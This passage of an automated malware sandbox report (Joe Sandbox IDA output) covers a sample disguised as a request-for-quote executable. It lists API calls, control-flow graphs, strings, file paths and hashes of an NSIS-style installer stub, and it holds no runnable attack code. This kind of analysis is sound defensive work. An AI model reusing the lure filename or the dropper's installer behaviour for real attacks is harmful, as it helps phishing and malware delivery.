                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                    • String ID: "C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                    • API String ID: 2035342205-4288632490
                                                                    • Opcode ID: e5205ecd88fce5ccf5828815dd77ba019690641696c58a1a3b737e95854e38d1
                                                                    • Instruction ID: b6454d918ebd5faba2d20934ef042a1c7892e73fe5aa147b237895e66f915a66
                                                                    • Opcode Fuzzy Hash: e5205ecd88fce5ccf5828815dd77ba019690641696c58a1a3b737e95854e38d1
                                                                    • Instruction Fuzzy Hash: 0041BF71900A14FACB21AB658C89EBF7678EB41768F10817BF801751D1D77C4981DEAE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0e2f680ccc61635b902b5d27a35f9f4c181eb1db892f7aa35b7a4bb0f1103339
                                                                    • Instruction ID: 8bf6f29b28aad36262c5774fab9fc5fc8376212b20b0a75e389b428f0a59168b
                                                                    • Opcode Fuzzy Hash: 0e2f680ccc61635b902b5d27a35f9f4c181eb1db892f7aa35b7a4bb0f1103339
                                                                    • Instruction Fuzzy Hash: B5F16571D00229CBCF18CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A9ACF44
                                                                    APIs
                                                                    • FindFirstFileW.KERNELBASE(75C43420,00425738,00424EF0,00405B1F,00424EF0,00424EF0,00000000,00424EF0,00424EF0,75C43420,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,75C43420,C:\Users\user\AppData\Local\Temp\), ref: 00406368
                                                                    • FindClose.KERNEL32(00000000), ref: 00406374
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: Find$CloseFileFirst
                                                                    • String ID: 8WB
                                                                    • API String ID: 2295610775-3088156181
                                                                    • Opcode ID: 4919aa1d8c56feb8b367bbb1b86ee1180edd575772c83518e79227edefbba0cf
                                                                    • Instruction ID: 8488419dd32d28aa1913c95702376fed147eab6209e3de196541cdf70887181d
                                                                    • Opcode Fuzzy Hash: 4919aa1d8c56feb8b367bbb1b86ee1180edd575772c83518e79227edefbba0cf
                                                                    • Instruction Fuzzy Hash: BED01231949120ABC31417786D0C88B7A599F553317218E33F82AF53E0C3348C2586E9

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 187 403c06-403c18 188 403d59-403d68 187->188 189 403c1e-403c24 187->189 191 403db7-403dcc 188->191 192 403d6a-403db2 GetDlgItem * 2 call 4040de SetClassLongW call 40140b 188->192 189->188 190 403c2a-403c33 189->190 195 403c35-403c42 SetWindowPos 190->195 196 403c48-403c4b 190->196 193 403e0c-403e11 call 40412a 191->193 194 403dce-403dd1 191->194 192->191 208 403e16-403e31 193->208 198 403dd3-403dde call 401389 194->198 199 403e04-403e06 194->199 195->196 200 403c65-403c6b 196->200 201 403c4d-403c5f ShowWindow 196->201 198->199 218 403de0-403dff 198->218 199->193 205 4040ab 199->205 206 403c87-403c8a 200->206 207 403c6d-403c82 DestroyWindow 200->207 201->200 216 4040ad-4040b4 205->216 214 403c8c-403c98 SetWindowLongW 206->214 215 403c9d-403ca3 206->215 211 404088-40408e 207->211 212 403e33-403e35 call 40140b 208->212 213 403e3a-403e40 208->213 211->205 219 404090-404096 211->219 212->213 221 403e46-403e51 213->221 222 404069-404082 DestroyWindow EndDialog 213->222 214->216 223 403d46-403d54 call 404145 215->223 224 403ca9-403cba GetDlgItem 215->224 218->216 219->205 226 404098-4040a1 ShowWindow 219->226 221->222 227 403e57-403ea4 call 40603c call 4040de * 3 GetDlgItem 221->227 222->211 223->216 228 403cd9-403cdc 224->228 229 403cbc-403cd3 IsWindowEnabled 224->229 226->205 259 403ea6-403eab 227->259 260 403eae-403eea ShowWindow KiUserCallbackDispatcher call 404100 EnableWindow 227->260 231 403ce1-403ce4 228->231 232 403cde-403cdf 228->232 229->205 229->228 238 403cf2-403cf7 231->238 239 403ce6-403cec 231->239 237 403d0f-403d14 call 4040b7 232->237 237->223 241 403d2d-403d3a 238->241 243 403cf9-403cff 238->243 239->241 242 403cee-403cf0 239->242 241->223 242->237 246 403d01-403d07 call 40140b 243->246 247 403d16-403d1f call 40140b 243->247 257 403d0d 246->257 247->223 255 403d21-403d2b 247->255 255->257 257->237 259->260 263 403eec-403eed 260->263 264 403eef 260->264 265 403ef1-403f1f GetSystemMenu EnableMenuItem SendMessageW 263->265 264->265 266 403f21-403f32 SendMessageW 265->266 267 403f34 265->267 268 403f3a-403f78 call 404113 call 40601a lstrlenW call 40603c SetWindowTextW call 401389 266->268 267->268 268->208 277 403f7e-403f80 268->277 277->208 278 403f86-403f8a 277->278 279 403fa9-403fbd DestroyWindow 278->279 280 403f8c-403f92 278->280 279->211 281 403fc3-403ff0 CreateDialogParamW 279->281 280->205 282 403f98-403f9e 280->282 281->211 283 403ff6-40404d call 4040de GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 281->283 282->208 284 403fa4 282->284 283->205 289 40404f-404062 ShowWindow call 40412a 283->289 284->205 291 404067 289->291 291->211
                                                                    APIs
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C42
                                                                    • ShowWindow.USER32(?), ref: 00403C5F
                                                                    • DestroyWindow.USER32 ref: 00403C73
                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403C8F
                                                                    • GetDlgItem.USER32(?,?), ref: 00403CB0
                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CC4
                                                                    • IsWindowEnabled.USER32(00000000), ref: 00403CCB
                                                                    • GetDlgItem.USER32(?,00000001), ref: 00403D79
                                                                    • GetDlgItem.USER32(?,00000002), ref: 00403D83
                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 00403D9D
                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403DEE
                                                                    • GetDlgItem.USER32(?,00000003), ref: 00403E94
                                                                    • ShowWindow.USER32(00000000,?), ref: 00403EB5
                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403EC7
                                                                    • EnableWindow.USER32(?,?), ref: 00403EE2
                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403EF8
                                                                    • EnableMenuItem.USER32(00000000), ref: 00403EFF
                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F17
                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F2A
                                                                    • lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 00403F53
                                                                    • SetWindowTextW.USER32(?,004226E8), ref: 00403F67
                                                                    • ShowWindow.USER32(?,0000000A), ref: 0040409B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                    • String ID: `7~v0}$&B
                                                                    • API String ID: 3282139019-3569327651
                                                                    • Opcode ID: 9a0603423a15e753b59f3bba80cdb29a1d953a93d90d9a1e173928d4099cede9
                                                                    • Instruction ID: 95f6c8bb4d7d19f6e547f96282e94f2ad2b423d9adc133d8208fe863fff8d237
                                                                    • Opcode Fuzzy Hash: 9a0603423a15e753b59f3bba80cdb29a1d953a93d90d9a1e173928d4099cede9
                                                                    • Instruction Fuzzy Hash: 6CC1A071A04204BBDB316F61ED85E2B3AA8FB95705F40053EF601B11F1C779A892DB2E

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 292 403863-40387b call 4063f4 295 40387d-40388d call 405f61 292->295 296 40388f-4038c6 call 405ee7 292->296 305 4038e9-403912 call 403b39 call 405ad6 295->305 301 4038c8-4038d9 call 405ee7 296->301 302 4038de-4038e4 lstrcatW 296->302 301->302 302->305 310 4039a4-4039ac call 405ad6 305->310 311 403918-40391d 305->311 317 4039ba-4039df LoadImageW 310->317 318 4039ae-4039b5 call 40603c 310->318 311->310 313 403923-40393d call 405ee7 311->313 316 403942-40394b 313->316 316->310 319 40394d-403951 316->319 321 403a60-403a68 call 40140b 317->321 322 4039e1-403a11 RegisterClassW 317->322 318->317 323 403963-40396f lstrlenW 319->323 324 403953-403960 call 4059fb 319->324 335 403a72-403a7d call 403b39 321->335 336 403a6a-403a6d 321->336 325 403a17-403a5b SystemParametersInfoW CreateWindowExW 322->325 326 403b2f 322->326 330 403971-40397f lstrcmpiW 323->330 331 403997-40399f call 4059ce call 40601a 323->331 324->323 325->321 329 403b31-403b38 326->329 330->331 334 403981-40398b GetFileAttributesW 330->334 331->310 338 403991-403992 call 405a1a 334->338 339 40398d-40398f 334->339 345 403a83-403a9d ShowWindow call 406384 335->345 346 403b06-403b07 call 40524c 335->346 336->329 338->331 339->331 339->338 351 403aa9-403abb GetClassInfoW 345->351 352 403a9f-403aa4 call 406384 345->352 350 403b0c-403b0e 346->350 353 403b10-403b16 350->353 354 403b28-403b2a call 40140b 350->354 357 403ad3-403af6 DialogBoxParamW call 40140b 351->357 358 403abd-403acd GetClassInfoW RegisterClassW 351->358 352->351 353->336 359 403b1c-403b23 call 40140b 353->359 354->326 363 403afb-403b04 call 4037b3 357->363 358->357 359->336 363->329
                                                                    APIs
                                                                      • Part of subcall function 004063F4: GetModuleHandleA.KERNEL32(?,00000020,?,004032D3,00000009), ref: 00406406
                                                                      • Part of subcall function 004063F4: GetProcAddress.KERNEL32(00000000,?), ref: 00406421
                                                                    • lstrcatW.KERNEL32(1033,004226E8), ref: 004038E4
                                                                    • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\savoyed\antimodel,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,75C43420), ref: 00403964
                                                                    • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\savoyed\antimodel,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403977
                                                                    • GetFileAttributesW.KERNEL32(Call), ref: 00403982
                                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\savoyed\antimodel), ref: 004039CB
                                                                      • Part of subcall function 00405F61: wsprintfW.USER32 ref: 00405F6E
                                                                    • RegisterClassW.USER32(004281A0), ref: 00403A08
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A20
                                                                    • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A55
                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403A8B
                                                                    • GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403AB7
                                                                    • GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403AC4
                                                                    • RegisterClassW.USER32(004281A0), ref: 00403ACD
                                                                    • DialogBoxParamW.USER32(?,00000000,00403C06,00000000), ref: 00403AEC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                    • String ID: "C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\savoyed\antimodel$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
                                                                    • API String ID: 1975747703-3184323542
                                                                    • Opcode ID: cdbcb31e795f676d20caa65ef3318a0b5d744cae9e788896206eebbc679a5327
                                                                    • Instruction ID: f2be8ff4b94e14f841e527fec55e0dfc0b13ef39e818ed8fa25aa33126975f24
                                                                    • Opcode Fuzzy Hash: cdbcb31e795f676d20caa65ef3318a0b5d744cae9e788896206eebbc679a5327
                                                                    • Instruction Fuzzy Hash: 6661C670644300BAD720AF669D46F3B3A6CEB84749F40457FF941B62E2D7785902CA7E

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 366 402dee-402e3c GetTickCount GetModuleFileNameW call 405bef 369 402e48-402e76 call 40601a call 405a1a call 40601a GetFileSize 366->369 370 402e3e-402e43 366->370 378 402f63-402f71 call 402d8a 369->378 379 402e7c 369->379 371 403020-403024 370->371 385 402f73-402f76 378->385 386 402fc6-402fcb 378->386 380 402e81-402e98 379->380 383 402e9a 380->383 384 402e9c-402ea5 call 40320c 380->384 383->384 392 402eab-402eb2 384->392 393 402fcd-402fd5 call 402d8a 384->393 388 402f78-402f90 call 403222 call 40320c 385->388 389 402f9a-402fc4 GlobalAlloc call 403222 call 403027 385->389 386->371 388->386 412 402f92-402f98 388->412 389->386 417 402fd7-402fe8 389->417 396 402eb4-402ec8 call 405baa 392->396 397 402f2e-402f32 392->397 393->386 403 402f3c-402f42 396->403 415 402eca-402ed1 396->415 402 402f34-402f3b call 402d8a 397->402 397->403 402->403 408 402f51-402f5b 403->408 409 402f44-402f4e call 4064a5 403->409 408->380 416 402f61 408->416 409->408 412->386 412->389 415->403 421 402ed3-402eda 415->421 416->378 418 402ff0-402ff5 417->418 419 402fea 417->419 422 402ff6-402ffc 418->422 419->418 421->403 423 402edc-402ee3 421->423 422->422 424 402ffe-403019 SetFilePointer call 405baa 422->424 423->403 425 402ee5-402eec 423->425 429 40301e 424->429 425->403 427 402eee-402f0e 425->427 427->386 428 402f14-402f18 427->428 430 402f20-402f28 428->430 431 402f1a-402f1e 428->431 429->371 430->403 432 402f2a-402f2c 430->432 431->416 431->430 432->403
                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 00402DFF
                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe,00000400,?,?,"C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe",00403500,?), ref: 00402E1B
                                                                      • Part of subcall function 00405BEF: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe",00403500,?), ref: 00405BF3
                                                                      • Part of subcall function 00405BEF: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe",00403500,?), ref: 00405C15
                                                                    • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe,C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe",00403500,?), ref: 00402E67
                                                                    Strings
                                                                    • Error launching installer, xrefs: 00402E3E
                                                                    • "C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe", xrefs: 00402DEE
                                                                    • Inst, xrefs: 00402ED3
                                                                    • C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe, xrefs: 00402E05, 00402E14, 00402E28, 00402E48
                                                                    • soft, xrefs: 00402EDC
                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00402DF5
                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402FC6
                                                                    • Null, xrefs: 00402EE5
                                                                    • C:\Users\user\Desktop, xrefs: 00402E49, 00402E4E, 00402E54
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                    • String ID: "C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                    • API String ID: 4283519449-3057503214
                                                                    • Opcode ID: 53a79ab10754b30072a285aae5e63ccf25b493d98f7d181817180c82abba2fcf
                                                                    • Instruction ID: 8ad5d6c736a045239d332ae2f481ce07f868331e1a87cba88ca9eb01e54a75c5
                                                                    • Opcode Fuzzy Hash: 53a79ab10754b30072a285aae5e63ccf25b493d98f7d181817180c82abba2fcf
                                                                    • Instruction Fuzzy Hash: 0651E671940206ABDB209F64DE89B9E7BB8EB04394F10407BF904B72D1C7BC9D419BAD

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 433 40603c-406047 434 406049-406058 433->434 435 40605a-406070 433->435 434->435 436 406076-406083 435->436 437 406288-40628e 435->437 436->437 440 406089-406090 436->440 438 406294-40629f 437->438 439 406095-4060a2 437->439 442 4062a1-4062a5 call 40601a 438->442 443 4062aa-4062ab 438->443 439->438 441 4060a8-4060b4 439->441 440->437 444 406275 441->444 445 4060ba-4060f6 441->445 442->443 447 406283-406286 444->447 448 406277-406281 444->448 449 406216-40621a 445->449 450 4060fc-406107 GetVersion 445->450 447->437 448->437 453 40621c-406220 449->453 454 40624f-406253 449->454 451 406121 450->451 452 406109-40610d 450->452 458 406128-40612f 451->458 452->451 455 40610f-406113 452->455 456 406230-40623d call 40601a 453->456 457 406222-40622e call 405f61 453->457 459 406262-406273 lstrlenW 454->459 460 406255-40625d call 40603c 454->460 455->451 461 406115-406119 455->461 471 406242-40624b 456->471 457->471 463 406131-406133 458->463 464 406134-406136 458->464 459->437 460->459 461->451 467 40611b-40611f 461->467 463->464 469 406172-406175 464->469 470 406138-40615e call 405ee7 464->470 467->458 472 406185-406188 469->472 473 406177-406183 GetSystemDirectoryW 469->473 483 406164-40616d call 40603c 470->483 484 4061fd-406201 470->484 471->459 475 40624d 471->475 477 4061f3-4061f5 472->477 478 40618a-406198 GetWindowsDirectoryW 472->478 476 4061f7-4061fb 473->476 480 40620e-406214 call 4062ae 475->480 476->480 476->484 477->476 482 40619a-4061a4 477->482 478->477 480->459 487 4061a6-4061a9 482->487 488 4061be-4061d4 SHGetSpecialFolderLocation 482->488 483->476 484->480 485 406203-406209 lstrcatW 484->485 485->480 487->488 491 4061ab-4061b2 487->491 492 4061d6-4061ed SHGetPathFromIDListW CoTaskMemFree 488->492 493 4061ef 488->493 494 4061ba-4061bc 491->494 492->476 492->493 493->477 494->476 494->488
                                                                    APIs
                                                                    • GetVersion.KERNEL32(00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsu3FA9.tmp\System.dll,?,004051B0,Skipped: C:\Users\user\AppData\Local\Temp\nsu3FA9.tmp\System.dll,00000000,00000000,0040FEA0), ref: 004060FF
                                                                    • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040617D
                                                                    • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 00406190
                                                                    • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004061CC
                                                                    • SHGetPathFromIDListW.SHELL32(?,Call), ref: 004061DA
                                                                    • CoTaskMemFree.OLE32(?), ref: 004061E5
                                                                    • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406209
                                                                    • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsu3FA9.tmp\System.dll,?,004051B0,Skipped: C:\Users\user\AppData\Local\Temp\nsu3FA9.tmp\System.dll,00000000,00000000,0040FEA0), ref: 00406263
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
